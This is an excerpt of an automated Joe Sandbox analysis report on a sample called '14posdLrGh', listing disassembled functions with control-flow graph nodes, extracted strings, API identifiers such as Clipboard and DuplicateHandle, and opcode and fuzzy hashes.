                                                                                                • Instruction Fuzzy Hash: 89212FB0D446188BEB68CF67CC097DABAF7BF85304F00C1E9C00CAA251DB750A898F51
                                                                                                Function 00881050 Relevance: .1, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1677331734.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_880000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 232b129583314411f9474b55d14966365768b5f1bd282964d8d2634fbd59d904
                                                                                                • Instruction ID: a0762ab0b391014e65e83b86e07ea788b7c5af0ced217d78bbc919caeb6d4878
                                                                                                • Opcode Fuzzy Hash: 232b129583314411f9474b55d14966365768b5f1bd282964d8d2634fbd59d904
                                                                                                • Instruction Fuzzy Hash: D321E0B0D046188BEB68DF17CC083DAFAF6BF89304F10D1E9C10CA6254DB750A858F91
                                                                                                Function 05AD3090 Relevance: 28.0, Strings: 21, Instructions: 1732COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 5ad3090-5ad30d8 6 5ad30dd 0->6 7 5ad30e6-5ad31f9 6->7 30 5ad3202 7->30 31 5ad320b-5ad331a 30->31 53 5ad3323 31->53 54 5ad332c-5ad34f9 53->54 85 5ad3504 54->85 86 5ad3510-5ad3546 85->86 91 5ad3550-5ad3562 86->91 92 5ad356e-5ad35d1 91->92 98 5ad35d6 92->98 99 5ad35e2-5ad3663 98->99 108 5ad366e-5ad367a call 5ad6959 99->108 110 5ad3686-5ad373b 108->110 121 5ad3740-5ad3746 call 5ad6e00 110->121 122 5ad374c-5ad3758 121->122 124 5ad3764-5ad3770 122->124 126 5ad377c-5ad38af 124->126 144 5ad38b4-5ad38ba call 5ad7b11 126->144 145 5ad38c0-5ad39e3 144->145 164 5ad39e9-5ad39f5 145->164 165 5ad3a00-5ad3a19 164->165 167 5ad3a1e-5ad3a24 call 5ad7ee2 165->167 168 5ad3a2a-5ad413c 167->168 284 5ad4148 168->284 285 5ad4154-5ad41bd 284->285 292 5ad41c8-5ad41ce call 5ad97d9 285->292 293 5ad41d4-5ad425f 292->293 302 5ad4265-5ad4271 293->302 303 5ad427c-5ad4295 302->303 305 5ad429a 303->305 306 5ad42a6-5ad43ff 305->306 328 5ad4404-5ad440a call 5ad9f39 306->328 329 5ad4410-5ad441c 328->329 331 5ad4428 329->331 332 5ad4434-5ad4caf 331->332 475 5ad4cbb 332->475 476 5ad4cc7-5ad5106 475->476 553 5ad5112 476->553 554 5ad511e-5ad517a 553->554 560 5ad517f-5ad518b call 5adc170 554->560 562 5ad5197-5ad521c 560->562 572 5ad5228 562->572 573 5ad5234-5ad5356 572->573
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682030189.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5ad0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q
                                                                                                • API String ID: 0-3940867653
                                                                                                • Opcode ID: c027db5a4af33f9e487e84788ecca63e11c354af38fb4ed7664a2f6d87d3502c
                                                                                                • Instruction ID: fbf80f6b1a54ba5653a192f8f73cb6e0c0a9732c5423c062fcfd25a32497c1f3
                                                                                                • Opcode Fuzzy Hash: c027db5a4af33f9e487e84788ecca63e11c354af38fb4ed7664a2f6d87d3502c
                                                                                                • Instruction Fuzzy Hash: 4923BFB4D102298FCB65AF74ED49A9DBBB5FF48301F1085EAE509A7220DB359E81DF40
                                                                                                Function 05AD30A0 Relevance: 28.0, Strings: 21, Instructions: 1726COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682030189.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5ad0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q
                                                                                                • API String ID: 0-3940867653
                                                                                                • Opcode ID: 773519aac84196b7f72d4c23025ef3a69050e7001d470c47aa7a61002f7c1c4b
                                                                                                • Instruction ID: a179dbaa15cf3d076cefab194db7330e460e881bae659ecf1a4b4aaa1ad85828
                                                                                                • Opcode Fuzzy Hash: 773519aac84196b7f72d4c23025ef3a69050e7001d470c47aa7a61002f7c1c4b
                                                                                                • Instruction Fuzzy Hash: CC23BFB4D102298FCB65AF74ED49A9DBBB5FF48301F1085EAE509A7220DB359E81DF40
                                                                                                Function 05AD0040 Relevance: 9.1, Strings: 7, Instructions: 395COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1480 5ad0040-5ad0057 1482 5ad0059-5ad005c 1480->1482 1483 5ad005e-5ad006c 1482->1483 1484 5ad0077-5ad007a 1482->1484 1490 5ad010a-5ad017e 1483->1490 1491 5ad0072 1483->1491 1485 5ad007c-5ad00b4 1484->1485 1486 5ad00eb-5ad00ee 1484->1486 1505 5ad00bb-5ad00e6 1485->1505 1488 5ad00f8-5ad00fa 1486->1488 1489 5ad00f0-5ad00f7 1486->1489 1492 5ad00fc 1488->1492 1493 5ad0101-5ad0104 1488->1493 1515 5ad0196-5ad0198 1490->1515 1516 5ad0180-5ad0186 1490->1516 1491->1484 1492->1493 1493->1482 1493->1490 1505->1486 1517 5ad054f-5ad0556 1515->1517 1518 5ad019e-5ad01af 1515->1518 1519 5ad0188 1516->1519 1520 5ad018a-5ad018c 1516->1520 1522 5ad01c7-5ad01e9 1518->1522 1523 5ad01b1-5ad01b7 1518->1523 1519->1515 1520->1515 1529 5ad01ef-5ad01fa 1522->1529 1530 5ad0510-5ad0534 1522->1530 1524 5ad01b9 1523->1524 1525 5ad01bb-5ad01bd 1523->1525 1524->1522 1525->1522 1533 5ad01fc-5ad0202 1529->1533 1534 5ad0212-5ad0287 1529->1534 1538 5ad053e 1530->1538 1539 5ad0536 1530->1539 1536 5ad0204 1533->1536 1537 5ad0206-5ad0208 1533->1537 1549 5ad0289-5ad0296 1534->1549 1550 5ad0298 1534->1550 1536->1534 1537->1534 1538->1517 1539->1538 1551 5ad029d-5ad029f 1549->1551 1550->1551 1551->1530 1552 5ad02a5-5ad02a9 1551->1552 1553 5ad02ab-5ad02b8 1552->1553 1554 5ad02ba 1552->1554 1555 5ad02bf-5ad02c1 1553->1555 1554->1555 1555->1530 1556 5ad02c7-5ad02cb 1555->1556 1557 5ad02cd-5ad02da 1556->1557 1558 5ad02dc 1556->1558 1559 5ad02e1-5ad02e3 1557->1559 1558->1559 1559->1530 1560 5ad02e9-5ad050a 1559->1560 1560->1529 1560->1530
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682030189.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5ad0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0oAp$DqAp$LjAp$LjAp$LjAp$LjAp$PH^q
                                                                                                • API String ID: 0-3655537035
                                                                                                • Opcode ID: 4b5445a6079788ae0cb78c1b5ac0002fbdf04bd679c0adf92c425128cdea3711
                                                                                                • Instruction ID: 05e2962903902e119827348efe71b8c2cc70e4323fa192986fa5b6a3440ab1e0
                                                                                                • Opcode Fuzzy Hash: 4b5445a6079788ae0cb78c1b5ac0002fbdf04bd679c0adf92c425128cdea3711
                                                                                                • Instruction Fuzzy Hash: 5BE1F674A102088FDB04AFB8E458AADBBF6FF88315F648469E506DB365EE35DC41CB50
                                                                                                Function 057D2460 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2231 57d2460-57d246f 2232 57d2475-57d2477 2231->2232 2233 57d24f3-57d2518 2231->2233 2234 57d247d-57d2481 2232->2234 2235 57d251f-57d254c 2232->2235 2233->2235 2237 57d2487-57d248f 2234->2237 2238 57d2553-57d2580 2234->2238 2235->2238 2239 57d2495-57d24a0 call 57d1e14 2237->2239 2240 57d2587-57d25b2 2237->2240 2238->2240 2250 57d24a9-57d24ad 2239->2250 2251 57d24a2-57d24a6 2239->2251 2263 57d25b9-57d25ba 2240->2263 2264 57d25b4-57d25b8 2240->2264 2253 57d24af-57d24b8 2250->2253 2254 57d24c3-57d24f0 2250->2254 2259 57d24c0 2253->2259 2259->2254 2265 57d25bb-57d25c0 2263->2265 2266 57d25c1-57d25ca 2263->2266 2264->2263 2265->2266 2268 57d25cc-57d25cf 2266->2268 2269 57d25d0-57d261a 2266->2269 2276 57d261c-57d261f 2269->2276 2277 57d2621-57d267d 2269->2277 2276->2277 2281 57d267f-57d2683 2277->2281 2282 57d2689-57d26ab 2277->2282 2281->2282 2284 57d26ad-57d26bb 2282->2284 2285 57d26c0-57d26c7 2282->2285 2286 57d27ac-57d27c8 2284->2286 2287 57d26c9-57d26dc 2285->2287 2288 57d26f0-57d26fa 2285->2288 2296 57d27ca-57d27cf 2286->2296 2297 57d27d1-57d27dd 2286->2297 2287->2288 2292 57d26de-57d26eb 2287->2292 2293 57d279e-57d27a9 2288->2293 2294 57d2700-57d2794 2288->2294 2292->2286 2293->2286 2294->2286 2303 57d2796-57d279c 2294->2303 2299 57d27e0-57d27e4 2296->2299 2297->2299 2301 57d27ea 2299->2301 2302 57d27e6-57d27e8 2299->2302 2304 57d27f3-57d27fe 2301->2304 2302->2304 2303->2286 2305 57d281e-57d2824 2304->2305 2306 57d2800-57d2802 2304->2306 2309 57d2827-57d28e0 2305->2309 2307 57d2808-57d280f 2306->2307 2308 57d2804-57d2806 2306->2308 2310 57d2814-57d281c 2307->2310 2308->2310 2324 57d28f1-57d28f5 2309->2324 2325 57d28e2-57d28e8 2309->2325 2310->2309 2326 57d28f7-57d28fd 2324->2326 2327 57d2906-57d290f 2324->2327 2325->2324 2326->2327
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1681530840.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_57d0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq$8cq$Hbq
                                                                                                • API String ID: 0-2410383223
                                                                                                • Opcode ID: f6f8c30b9c47e5bfd3fd550bb7ab4d7a23c2ffc243cf58e7a743abdae0aa85f9
                                                                                                • Instruction ID: 16783c89a3457435ae927fbd8904784756c44f783d78445b69284aaf237c83ec
                                                                                                • Opcode Fuzzy Hash: f6f8c30b9c47e5bfd3fd550bb7ab4d7a23c2ffc243cf58e7a743abdae0aa85f9
                                                                                                • Instruction Fuzzy Hash: F5F17D74A102548FCB54DF69C488A6DBBF6FF88310F1581AAE806DB366DB34DC45CB60
                                                                                                Function 05CF0C98 Relevance: 2.6, Strings: 2, Instructions: 103COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3092 5cf0c98-5cf0cb8 3117 5cf0cbb call 5cf0de8 3092->3117 3118 5cf0cbb call 5cf0df8 3092->3118 3093 5cf0cc1-5cf0cd8 3094 5cf0cde-5cf0ce0 3093->3094 3095 5cf0d60-5cf0d64 3093->3095 3098 5cf0cf2-5cf0cff 3094->3098 3099 5cf0ce2-5cf0cf0 3094->3099 3096 5cf0d66-5cf0d70 3095->3096 3097 5cf0d73-5cf0d7c 3095->3097 3098->3095 3102 5cf0d01-5cf0d03 3098->3102 3099->3095 3099->3098 3103 5cf0d53-5cf0d59 3102->3103 3103->3095 3104 5cf0d5b-5cf0d5e 3103->3104 3104->3095 3105 5cf0d05-5cf0d08 3104->3105 3106 5cf0d7f-5cf0db1 3105->3106 3107 5cf0d0a-5cf0d1a 3105->3107 3110 5cf0d1c-5cf0d35 3107->3110 3111 5cf0d52 3107->3111 3110->3111 3113 5cf0d37-5cf0d39 3110->3113 3111->3103 3113->3111 3114 5cf0d3b-5cf0d49 3113->3114 3114->3111 3116 5cf0d4b-5cf0d50 3114->3116 3116->3095 3117->3093 3118->3093
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682229099.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5cf0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q$Te^q
                                                                                                • API String ID: 0-3743469327
                                                                                                • Opcode ID: 1e847b4db0bcb0f11e4bb2e0d52114591ddd78a8310c1c347d9fb2d2858556c8
                                                                                                • Instruction ID: bf4e80451b2689e5e84e8fcc8412f4ba5ce0b0b60f51e5214aa754f647e77469
                                                                                                • Opcode Fuzzy Hash: 1e847b4db0bcb0f11e4bb2e0d52114591ddd78a8310c1c347d9fb2d2858556c8
                                                                                                • Instruction Fuzzy Hash: CC311875E042494FCB51CB69C8486BFFBF6BF80700F048426DA56E3256E6389505C750
                                                                                                Function 057D3A20 Relevance: 2.4, Strings: 1, Instructions: 1113COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3119 57d3a20-57d3a4b 3120 57d3a4d-57d3a4f 3119->3120 3121 57d3a56-57d3a59 3120->3121 3122 57d3a51 3120->3122 3121->3120 3123 57d3a5b-57d3b0b call 57d4d99 3121->3123 3122->3121 3142 57d3b14-57d4d93 3123->3142
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1681530840.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_57d0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LR^q
                                                                                                • API String ID: 0-2625958711
                                                                                                • Opcode ID: 8ae6da97791280facb7266c095daf202808712c55240233957db6a7978594038
                                                                                                • Instruction ID: f48b85950a4a8d281d5df16e3a8b1432012d135ad08d3c5bf7c946fb69406908
                                                                                                • Opcode Fuzzy Hash: 8ae6da97791280facb7266c095daf202808712c55240233957db6a7978594038
                                                                                                • Instruction Fuzzy Hash: DCC2D274E512298FCF55AFB4D858A9EBBB2BF48300F1049E9E409A7361DB349E81CF51
                                                                                                Function 057D3A30 Relevance: 2.4, Strings: 1, Instructions: 1108COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3495 57d3a30-57d3a4b 3496 57d3a4d-57d3a4f 3495->3496 3497 57d3a56-57d3a59 3496->3497 3498 57d3a51 3496->3498 3497->3496 3499 57d3a5b-57d3b0b call 57d4d99 3497->3499 3498->3497 3518 57d3b14-57d4d93 3499->3518
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1681530840.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_57d0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LR^q
                                                                                                • API String ID: 0-2625958711
                                                                                                • Opcode ID: 5135ff5aa8599cb81b0ae76e226f67e4514fba6c0a025264d547083256572591
                                                                                                • Instruction ID: dcc7b5443eaa8ac9e60380cea113f62c8185f63db479b750195af38ba19177a0
                                                                                                • Opcode Fuzzy Hash: 5135ff5aa8599cb81b0ae76e226f67e4514fba6c0a025264d547083256572591
                                                                                                • Instruction Fuzzy Hash: 63C2D274E512298FCF55AFB4D858A9EBBB2BF48300F1049E9E409A7361DB349E81CF51
                                                                                                Function 05AEDA90 Relevance: 1.7, APIs: 1, Instructions: 191comclipboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682065834.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5ae0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard
                                                                                                • String ID:
                                                                                                • API String ID: 220874293-0
                                                                                                • Opcode ID: 0df82b0d9dbf149d8ced96c3c580ec3bc1a3da371e91290117d99b1fbe755eff
                                                                                                • Instruction ID: 66841db643089056fdaa70546748e56df31c84daad7ed3bed3cfe6019d53f629
                                                                                                • Opcode Fuzzy Hash: 0df82b0d9dbf149d8ced96c3c580ec3bc1a3da371e91290117d99b1fbe755eff
                                                                                                • Instruction Fuzzy Hash: FC618AB0E042489FDB10DFA9D880B9EBFF5FF89300F24856AE515AB364DB709945CB94
                                                                                                Function 008818AC Relevance: 1.7, Strings: 1, Instructions: 415COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1677331734.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_880000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @ubq
                                                                                                • API String ID: 0-2560845077
                                                                                                • Opcode ID: ee94b6b10509513ac3702203087815d2edeadd7f0eebeef387cf79a329d13952
                                                                                                • Instruction ID: 95b4ce476f1a3f74291321eac5e2b6ec08e0ae18981a1ddc43e5f3ae4164092d
                                                                                                • Opcode Fuzzy Hash: ee94b6b10509513ac3702203087815d2edeadd7f0eebeef387cf79a329d13952
                                                                                                • Instruction Fuzzy Hash: CA12A874C41229CFDF60DFA4C988BEDBBB5BF09305F1094A9E409A7261DB749A86CF50
                                                                                                Function 05AECB79 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05AECC4B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682065834.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5ae0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 72b3897259042b2084fb5eb1bd904aa59b4ade3606328573dff7d97f18be618d
                                                                                                • Instruction ID: 14d05cfb221929d381cafee42124763a1e9271e3a490108b0b615fcd598b95b3
                                                                                                • Opcode Fuzzy Hash: 72b3897259042b2084fb5eb1bd904aa59b4ade3606328573dff7d97f18be618d
                                                                                                • Instruction Fuzzy Hash: 694176B9D002589FCB10CFA9D984ADEBBF5BB49310F14902AE818BB320D335A945CF94
                                                                                                Function 05AECB80 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05AECC4B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682065834.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5ae0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: a41d58d38b0da3c379eb2e21b669e8f5f7d87495471a1405ddc54ca45113613d
                                                                                                • Instruction ID: f4138e3bb85b366d9cdf9f92726706cd64e0b632fd1ffa56a4af4fa4dadbaf1c
                                                                                                • Opcode Fuzzy Hash: a41d58d38b0da3c379eb2e21b669e8f5f7d87495471a1405ddc54ca45113613d
                                                                                                • Instruction Fuzzy Hash: 434166B9D002589FCF00CFA9D984ADEBBF5BB49320F14902AE918BB320D335A945CF54
                                                                                                Function 05AEC5E8 Relevance: 1.6, APIs: 1, Instructions: 107comclipboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682065834.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5ae0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard
                                                                                                • String ID:
                                                                                                • API String ID: 220874293-0
                                                                                                • Opcode ID: bb62458cc5bc23d47ca3a0955a0976eb7dcf665d47f8bbd923a0351365ea45c9
                                                                                                • Instruction ID: 513bb4215467b36de3f9ab27a99d997af588051602d874f843753fed3cf5b253
                                                                                                • Opcode Fuzzy Hash: bb62458cc5bc23d47ca3a0955a0976eb7dcf665d47f8bbd923a0351365ea45c9
                                                                                                • Instruction Fuzzy Hash: F941AAB0D04248DFDB10DFA9C984B9EBBF5EF48300F20942AE405BB264D7B5A985CF95
                                                                                                Function 00886290 Relevance: 1.6, Instructions: 1589COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1677331734.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_880000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 64ee79f99e20541abe5261bacaedaed3d6437bc6b08115c4affa4e784b6fd11e
                                                                                                • Instruction ID: 98a02d218fe69f68e1300415b356d60451ca090e49b7e31bd3f015030035402e
                                                                                                • Opcode Fuzzy Hash: 64ee79f99e20541abe5261bacaedaed3d6437bc6b08115c4affa4e784b6fd11e
                                                                                                • Instruction Fuzzy Hash: 9CF2A474A402199FCB549FB4DC4CA9EBBBAFF48311F10A9D9E509E3365DB348A818F50
                                                                                                Function 05AEC4D0 Relevance: 1.6, APIs: 1, Instructions: 72comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682065834.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5ae0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: 69ae87aba072df9a4a04ac9824318060a7c91f0426255ae6be48848ae7f9c20e
                                                                                                • Instruction ID: 8847fa2ba4e2595070a8c165fa17b4f12d9e55543aa1682f0bafadda4283c43e
                                                                                                • Opcode Fuzzy Hash: 69ae87aba072df9a4a04ac9824318060a7c91f0426255ae6be48848ae7f9c20e
                                                                                                • Instruction Fuzzy Hash: A43187B8D012589FCB10CFA9D884A9EFBF4FB49310F10946AE818B7310D375A941CFA8
                                                                                                Function 05AED1E0 Relevance: 1.6, APIs: 1, Instructions: 72comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682065834.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5ae0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: 8ede86e018aaa8cce70da1b450108b37156955a594befc953171198f42fd73b6
                                                                                                • Instruction ID: dae9d5fc6b2e7c9e55bb82478f4185db29e1d7ac275dd493d5c4dfbeffc12498
                                                                                                • Opcode Fuzzy Hash: 8ede86e018aaa8cce70da1b450108b37156955a594befc953171198f42fd73b6
                                                                                                • Instruction Fuzzy Hash: 8631A9B8D012589FCB10CFA9D884ADEFBF4BB09310F10942AE814B7310D374A941CF64
                                                                                                Function 05AD1BD0 Relevance: 1.6, Strings: 1, Instructions: 315COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682030189.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5ad0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: 503880de1e472d47b1e9c93fe7b1d9738078d49ae311e73a2ba52039596f4f5e
                                                                                                • Instruction ID: 58377e931977d2402352207ce00176fcec3df87b85299b2478e2d02303fcc7dd
                                                                                                • Opcode Fuzzy Hash: 503880de1e472d47b1e9c93fe7b1d9738078d49ae311e73a2ba52039596f4f5e
                                                                                                • Instruction Fuzzy Hash: 06C12874A102099FCB14EFB5E589AAEBBF2BF88301F208465E406E7359DF749C41DB90
                                                                                                Function 05AD1BC2 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682030189.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5ad0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: 1d28579e9adc43585f3b37c93a2ea6d3b2992c0f518900a509f7ff5de431dd81
                                                                                                • Instruction ID: a8baa93e4a34dfe1ce2af6d8084a9e5bf961e39dfb6df1d4fc03065a60e754d6
                                                                                                • Opcode Fuzzy Hash: 1d28579e9adc43585f3b37c93a2ea6d3b2992c0f518900a509f7ff5de431dd81
                                                                                                • Instruction Fuzzy Hash: B3614D74B002089FDB14EFA9D589AADBBF6FF88700F208465E406EB355DB749C45CB91
                                                                                                Function 05CF35F8 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1682229099.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5cf0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PH^q
                                                                                                • API String ID: 0-2549759414
                                                                                                • Opcode ID: 8dd437edc6579ef740e71c2ca7246894c898227547bd0a62a4552d844a6893db
                                                                                                • Instruction ID: 936c332d35d037bfa7434bce8b7f9c5b752acebb0cbebbc737af226c095d1db2
                                                                                                • Opcode Fuzzy Hash: 8dd437edc6579ef740e71c2ca7246894c898227547bd0a62a4552d844a6893db
                                                                                                • Instruction Fuzzy Hash: 00411170700245AFEB55AB74D5186AE77E3BFC4A00F20486AC606DB394EF34DE4687D2
                                                                                                Function 057D0B00 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1681530840.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_57d0000_14posdLrGh.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Te^q
                                                                                                • API String ID: 0-671973202
                                                                                                • Opcode ID: 31bfa22b8811ab795b5342afdb47b7714e3a63464a2038699bd548dea27f16b6
                                                                                                • Instruction ID: 53de37977496edcb7eee201b7c05a16704cf5f9f1ee653c1cd1aef8c6f1df703
                                                                                                • Opcode Fuzzy Hash: 31bfa22b8811ab795b5342afdb47b7714e3a63464a2038699bd548dea27f16b6
                                                                                                • Instruction Fuzzy Hash: 83417E31E103199BDB10CFA1C8987AEFBF6FF84704F108529E905AB254EBB09846DB90
